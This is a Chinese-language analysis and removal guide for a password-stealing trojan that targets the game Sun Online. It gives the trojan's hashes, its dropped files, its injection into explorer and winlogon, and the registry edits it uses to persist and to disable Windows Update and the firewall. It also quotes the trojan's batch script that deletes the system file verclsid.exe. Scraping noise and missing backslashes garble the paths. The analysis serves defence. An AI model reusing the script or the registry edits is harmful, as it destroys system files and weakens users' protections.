Tojan-PWS.Win32.OnLineGames.uo

病毒名称：Tojan-PWS.Win32.OnLineGames.uo（Kaspersky）

病毒别名：Trojan.PSW.Win32.SunOnline.ab（瑞星）

病毒大小：10994 bytes

加壳方式：UPACK, BINARYRES

样本MD5：7f84234d88df5a4ce372b465b4fb825a

样本SHA1：828a7ef284319d145c82003b9935634212c5268b

编写语言：Borland Delphi 6.0-7.0

字串6

行为分析： 字串8

病毒运行后，释放批处理C:DeleteFileDos.bat，删除正常verclsid.exe系统文件

批处理内容：

@echo off

:Loop

attrib "C:WINDOWSSYSTEM32VERCLSID.EXE" -r -a -s -h

del "C:WINDOWSSYSTEM32VERCLSID.EXE"

if exist "C:WINDOWSSYSTEM32VERCLSID.EXE" goto Loop

del %0

字串4

释放dll文件：

%System32%Kvsc32.dll

注入系统explorer.exe和winlogon.exe进程，监.视sungames.exe进程（奇迹世界），如发现则记录键盘击键和鼠标操作，以此盗取密码等用户信息 字串3

病毒还会生成 %System32%kvsc3.ini配置文件，记录病毒版本等信息

字串9

病毒添加以下注册表项，以达到随机启动的目的：

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWindows]

"AppInit_DLLs"="Kvsc32.dll"

字串2

[HKEY_CLASSES_ROOTCLSID{54123FF1-8371-9834-9021-184518451FA5}InProcServer32]

@="%System32%Kvsc32.dll"

字串4

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows

CurrentVersionExplorerShellExecuteHooks]

"{54123FF1-8371-9834-9021-184518451FA5}"="%System32%Kvsc32.dll"

字串5

病毒修改以下注册表值，禁用系统自动更新功能：

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWindowsUpdateAUNoAutoUpdate]

"Start"=dword:00000001

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWindowsUpdateAUAUOptions]

"Start"=dword:00000001 字串8

病毒添加以下注册表值，禁用系统防火墙：

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices

SharedAccessParametersFirewallPolicyStandardProfileEnableFirewall]

"Start"=dword:00000000

字串6

释放批处理删除自身

字串4

手动解决方法：

由于病毒注入了系统explorer.exe和winlogon.exe进程，监视注册表，推荐用冰刃。

1，用冰刃强制删除：

%System32%Kvsc32.dll

2，用IS，进程――选中EXPLORER进程――右键:模块信息――强制卸除： 字串5

%System32%Kvsc32.dll

3，删除文件：

%System32%kvsc3.ini

4，删除以下注册表值：

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices

SharedAccessParametersFirewallPolicyStandardProfileEnableFirewall]

"Start"=dword:00000000

[HKEY_CLASSES_ROOTCLSID{54123FF1-8371-9834-9021-184518451FA5}InProcServer32]

@="%System32%Kvsc32.dll"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

ExplorerShellExecuteHooks]

"{54123FF1-8371-9834-9021-184518451FA5}"="%System32%Kvsc32.dll"

5，编辑以下注册表键值为空：

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWindows]

"AppInit_DLLs"=" "

6,修改以下注册表键值，建议开启自动更新：

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoft

WindowsWindowsUpdateAUNoAutoUpdate]

"Start"=dword:00000000

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoft

WindowsWindowsUpdateAUAUOptions]

字串1

"Start"=dword:00000004

7，从别的电脑或恢复光盘等拷.贝同版本系统的正常%System32%verclsid.exe系统文件